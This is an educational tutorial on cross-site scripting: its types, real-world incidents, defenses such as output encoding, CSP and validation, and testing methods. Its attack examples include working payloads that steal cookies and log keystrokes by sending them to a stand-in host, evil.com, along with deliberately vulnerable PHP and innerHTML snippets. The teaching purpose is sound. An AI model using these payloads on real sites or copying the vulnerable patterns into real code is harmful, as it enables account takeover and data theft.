Understanding Cross-Site Scripting

What Is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a vulnerability that allows an attacker to inject malicious JavaScript into web pages viewed by other users. When the victim's browser loads the page, it executes the injected script as if it were legitimate code from the website. The browser has no way to know the script was not intended by the site's developers.

XSS is consistently ranked among the top web application vulnerabilities. It appears in the OWASP Top 10 and has been used in attacks against major organizations including social media platforms, email services, and banking applications.

💡

Why "Cross-Site"?

The name comes from the fact that the attack crosses the boundary between sites. An attacker's code runs in the context of the victim site, with access to that site's cookies, session data, and DOM. From the browser's perspective, the malicious script has the same privileges as any other script on that page.

The root cause of XSS is always the same: the application includes untrusted data in its output without proper sanitization or encoding. Any place where user input ends up in a web page is a potential XSS injection point.

Types of XSS Attacks

XSS attacks are classified into three types based on how the malicious script reaches the victim's browser. Understanding each type is essential for building effective defenses.

Stored XSS (Persistent)

In stored XSS, the attacker's malicious script is permanently saved on the target server -- typically in a database, comment field, forum post, or user profile. Every user who views the affected page receives the malicious script as part of the normal page content.

<!-- Attacker submits this as a forum comment -->
Great article! <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>

<!-- The server stores it in the database and later renders it -->
<div class="comment">
  <p>Great article! <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script></p>
</div>

<!-- Every visitor's browser now executes the script -->

Stored XSS is the most dangerous type because it does not require the attacker to trick users into clicking a link. The malicious payload is served automatically to every visitor. A single stored XSS in a popular forum post could compromise thousands of accounts.

Reflected XSS (Non-Persistent)

In reflected XSS, the malicious script is included in a request to the server (usually in a URL parameter or form field) and immediately reflected back in the response without being stored. The attacker must trick the victim into clicking a crafted link.

<!-- Vulnerable search page at example.com/search -->
<!-- Server-side code (PHP example): -->
<p>Search results for: <?php echo $_GET['q']; ?></p>

<!-- Attacker crafts this URL and sends it to the victim: -->
https://example.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script>

<!-- When the victim clicks the link, the server reflects the script back -->
<p>Search results for: <script>document.location='https://evil.com/steal?c='+document.cookie</script></p>

Reflected XSS requires social engineering to deliver the malicious link to the victim, which limits its reach compared to stored XSS. However, it is extremely common because so many applications reflect user input in their responses.

DOM-Based XSS

DOM-based XSS occurs entirely in the browser. The vulnerability is in client-side JavaScript code that reads data from an attacker-controllable source (like the URL fragment or document.referrer) and writes it into the page without sanitization. The server never sees the malicious payload.

<!-- Vulnerable JavaScript on the page -->
<script>
  // Reads the 'name' parameter from the URL hash
  var name = location.hash.substring(1);
  document.getElementById('greeting').innerHTML = 'Hello, ' + name + '!';
</script>

<!-- Attacker sends this URL: -->
https://example.com/page#<img src=x onerror=alert(document.cookie)>

<!-- The JavaScript writes the payload into the DOM -->
<div id="greeting">Hello, <img src=x onerror=alert(document.cookie)>!</div>

⚠️

innerHTML is dangerous.

Using innerHTML to insert user-controlled data is one of the most common causes of DOM-based XSS. Always use textContent instead when you want to display text. textContent treats the input as plain text and will never execute HTML or scripts.

How XSS Attacks Work in Practice

A simple alert() popup proves a vulnerability exists, but real attacks go much further. Here is what an attacker can do once they can execute JavaScript in a victim's browser session.

Session Hijacking

The most common XSS attack steals session cookies. Once the attacker has the victim's session cookie, they can impersonate the victim without knowing their password.

<!-- Steal session cookie and send it to attacker's server -->
<script>
  new Image().src = 'https://evil.com/log?cookie=' + encodeURIComponent(document.cookie);
</script>

Keylogging

Injected scripts can capture every keystroke the user types on the page, including passwords, credit card numbers, and private messages.

<script>
  document.addEventListener('keypress', function(e) {
    fetch('https://evil.com/keys', {
      method: 'POST',
      body: JSON.stringify({ key: e.key, timestamp: Date.now() })
    });
  });
</script>

Phishing and Page Manipulation

An attacker can modify the entire page content, replacing the login form with one that sends credentials to the attacker's server. Because the URL still shows the legitimate domain, the victim has no visual indication that something is wrong.

Real-World Impact

XSS vulnerabilities have been exploited in major incidents that affected millions of users. Understanding the real-world scale helps justify the investment in prevention.

Samy Worm (2005) -- A stored XSS worm on MySpace that added the attacker as a friend and propagated the payload to each victim's profile. It infected over one million accounts in under 24 hours, making it the fastest-spreading worm at the time.
British Airways (2018) -- Attackers injected malicious JavaScript into the payment page via a supply chain compromise. Approximately 380,000 payment card details were stolen. BA was fined 20 million pounds by the UK ICO.
eBay (2015-2016) -- Persistent XSS vulnerabilities in eBay listings allowed attackers to inject scripts into product pages, redirecting buyers to phishing sites.
TweetDeck (2014) -- A stored XSS worm spread through Twitter's TweetDeck application, automatically retweeting itself and affecting over 80,000 users before Twitter shut down TweetDeck temporarily.

⚠️

XSS can lead to full account takeover.

If a site is vulnerable to XSS and does not use the HttpOnly cookie flag, an attacker can steal session cookies and take complete control of user accounts. Even with HttpOnly cookies, XSS allows attackers to perform actions as the victim using their active session.

Prevention: Output Encoding

The most effective defense against XSS is output encoding (also called output escaping). The idea is simple: before inserting any untrusted data into HTML, convert special characters into their HTML entity equivalents so the browser treats them as text, not code.

HTML Entity Encoding

<!-- These characters must be encoded when inserting into HTML: -->
&  becomes  &amp;
<  becomes  &lt;
>  becomes  &gt;
"  becomes  &quot;
'  becomes  &#x27;

<!-- Example: user input is "<script>alert(1)</script>" -->

<!-- Without encoding (VULNERABLE): -->
<p><script>alert(1)</script></p>

<!-- With encoding (SAFE): -->
<p>&lt;script&gt;alert(1)&lt;/script&gt;</p>
<!-- Browser displays: <script>alert(1)</script> as text -->

Context-Aware Encoding

The correct encoding depends on where the data is being inserted. HTML encoding is not sufficient for all contexts.

HTML body Use HTML entity encoding. Convert < > & " ' to their entity forms.

HTML attributes Use attribute encoding. Always quote attribute values and encode the quote character used.

JavaScript strings Use JavaScript encoding. Escape special characters with their Unicode escape sequences (\uXXXX).

URLs Use URL encoding (encodeURIComponent()). Encode special characters as percent-encoded values.

CSS Use CSS encoding. Avoid inserting user data into CSS if possible. If unavoidable, use CSS hex encoding.

Framework Auto-Encoding

Modern web frameworks provide automatic output encoding by default. This is the single biggest improvement in XSS prevention over the past decade.

<!-- React: JSX automatically encodes expressions -->
<p>{userInput}</p>  <!-- Safe: React encodes userInput -->

<!-- Vue.js: double curly braces auto-encode -->
<p>{{ userInput }}</p>  <!-- Safe: Vue encodes userInput -->

<!-- Django templates: auto-encode by default -->
<p>{{ user_input }}</p>  <!-- Safe: Django encodes user_input -->

<!-- DANGEROUS: bypassing auto-encoding -->
<div dangerouslySetInnerHTML={{__html: userInput}} />  <!-- React: UNSAFE -->
<p v-html="userInput"></p>                             <!-- Vue: UNSAFE -->
{{ user_input|safe }}                                     <!-- Django: UNSAFE -->

💡

Never bypass auto-encoding without a security review.

Methods like dangerouslySetInnerHTML (React), v-html (Vue), and the |safe filter (Django/Jinja) exist for rare cases where you genuinely need to render trusted HTML. If the data comes from user input, do not use these. If you must render user-provided HTML, use a dedicated HTML sanitizer library like DOMPurify.

Prevention: Content Security Policy

Content Security Policy (CSP) is a powerful HTTP header that acts as a second line of defense against XSS. Even if an attacker finds a way to inject a script tag, CSP can prevent it from executing.

# Strong CSP that blocks most XSS attacks
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self';

This policy tells the browser to only execute scripts loaded from your own domain. Inline scripts (the most common XSS payload) are blocked by default. Even if an attacker injects <script>alert(1)</script>, the browser will refuse to run it because inline scripts are not allowed.

Using Nonces for Inline Scripts

If your application needs inline scripts, use a CSP nonce. The server generates a random token for each page load and includes it in both the CSP header and the legitimate script tags. Only scripts with the matching nonce will execute.

<!-- Server generates a unique nonce per request -->
Content-Security-Policy: script-src 'nonce-a1b2c3d4e5f6'

<!-- Legitimate script with matching nonce: RUNS -->
<script nonce="a1b2c3d4e5f6">
  console.log('This runs because it has the correct nonce');
</script>

<!-- Injected script without nonce: BLOCKED -->
<script>alert('This is blocked by CSP')</script>

Prevention: Input Validation

Input validation is the third layer of defense. While it should never be your only protection, validating input reduces the attack surface by rejecting obviously malicious data before it enters your system.

Validation Principles

Allowlisting over blocklisting -- Define what is allowed, not what is forbidden. Blocklists always miss edge cases. If a field should contain a phone number, validate that it only contains digits, spaces, hyphens, and plus signs.
Validate on the server -- Client-side validation improves UX but provides zero security. An attacker can bypass it trivially by sending requests directly to the server.
Validate type and format -- Numeric fields should only accept numbers. Email fields should match email format. Dates should parse as valid dates.
Limit length -- Set reasonable maximum lengths for all input fields. A username does not need to accept 10,000 characters.

# Server-side validation example (Python/Flask)
from markupsafe import escape

@app.route('/search')
def search():
    query = request.args.get('q', '')

    # Validation: limit length
    if len(query) > 200:
        return 'Search query too long', 400

    # Validation: strip control characters
    query = ''.join(c for c in query if c.isprintable())

    # Output encoding: escape for HTML context
    safe_query = escape(query)

    return render_template('results.html', query=safe_query)

⚠️

Input validation alone does NOT prevent XSS.

There are countless encoding tricks, Unicode bypasses, and context-specific payloads that can evade input filters. Validation is a useful additional layer, but output encoding must always be your primary defense. The OWASP recommendation is: encode on output, validate on input, and use CSP as a safety net.

Testing for XSS

Whether you are a developer testing your own application or learning about web security, knowing how to identify XSS vulnerabilities is a critical skill.

Manual Testing Approach

Identify injection points: Find every place where user input appears in the page output -- search bars, form fields, URL parameters, error messages, profile fields, comment sections, and HTTP headers.

Submit test payloads: Start with a simple, harmless payload like <b>test</b>. If the text appears bold on the page, the application is not encoding HTML and is likely vulnerable to XSS.

Check the rendering context: View the page source (Ctrl+U) to see exactly how your input was rendered. Is it inside an HTML tag, an attribute, a JavaScript string, or a CSS value? The context determines which payloads will work.

Test context-specific payloads: If your input lands inside an HTML attribute, try breaking out of it with a quote character. If it lands in JavaScript, try closing the string and injecting code.

Automated Tools

Burp Suite -- Professional web security scanner with an XSS detection module. The Community Edition is free and sufficient for learning.
OWASP ZAP -- Free, open-source security scanner. Its active scanner automatically tests for reflected and stored XSS.
Browser Developer Tools -- Use the Console tab to check for CSP violations and the Network tab to inspect how inputs are reflected in responses.

💡

Practice Legally

Only test for XSS on applications you own or have explicit written permission to test. Use intentionally vulnerable practice labs like OWASP WebGoat, DVWA (Damn Vulnerable Web Application), or PortSwigger Web Security Academy to develop your skills safely and legally.

Summary

Cross-Site Scripting remains one of the most prevalent and impactful web vulnerabilities. Here is what you learned:

XSS allows attackers to inject malicious JavaScript that runs in victims' browsers with the same privileges as the legitimate site
Stored XSS persists on the server and attacks every visitor; Reflected XSS requires a crafted link; DOM-based XSS occurs entirely in client-side code
XSS enables session hijacking, keylogging, phishing, and full account takeover
Output encoding is the primary defense -- always encode untrusted data for the correct context (HTML, attribute, JavaScript, URL)
Content Security Policy acts as a safety net by restricting which scripts the browser will execute
Input validation is a useful additional layer but must never be relied upon alone
Modern frameworks provide automatic encoding -- never bypass it without a security review

🎉

Solid foundation!

You now understand how XSS works and how to defend against it. Next, learn about SQL Injection -- another critical injection vulnerability that targets the database layer instead of the browser.